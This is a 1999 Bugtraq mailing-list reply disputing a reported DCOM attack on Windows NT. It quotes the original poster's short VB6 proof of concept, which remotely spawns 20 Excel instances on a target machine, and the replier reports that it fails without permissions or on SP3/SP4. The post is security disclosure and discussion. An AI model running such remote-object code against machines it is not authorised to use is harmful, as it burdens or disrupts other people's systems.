[11466] in bugtraq
Re: FW: DCOM attack against NT using VB6
daemon@ATHENA.MIT.EDU (Erik Nielsen)
Sat Aug 21 13:01:37 1999
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <001601beeaa8$af0e2e20$16519bcf@eniel.mexcom.com>
Date: Thu, 19 Aug 1999 18:09:42 -0700
Reply-To: Erik Nielsen <erik@ERIKNIELSEN.COM>
From: Erik Nielsen <erik@ERIKNIELSEN.COM>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
First off, Could not run the program without proper permission on the target
machine. Then, could not recreate on SP3 or SP4. The program just went
through it's paces with no action resulting.
Targets were NT 4 with SP3 and SP4, both with Office 97
Source machine was WIN95 OSR2 with VB6 SP3.
>Using the code below I was able to create 20 instances of Excel on my
>co-workers machines without modifying their machines at all. The target
>must be Windows NT Workstation/Server running sp3 or sp4. sp5 seems to
>prevent the attack.
>
>Private Sub Command1_Click()
> Dim xlObj As Object
> Dim xlCollection As New Collection
> Dim i As Long
> For i = 1 To 20
> Set xlObj = CreateObject("Excel.Application", "\\NTBox")
> xlCollection.Add xlObj
> Next i
>
> i = 1
> 'clean up
> While xlCollection.Count > 0
> xlCollection.Remove (xlCollection.Count)
> Wend
> Set xlCollection = Nothing
>End Sub
>
>-Robert E. Lempke
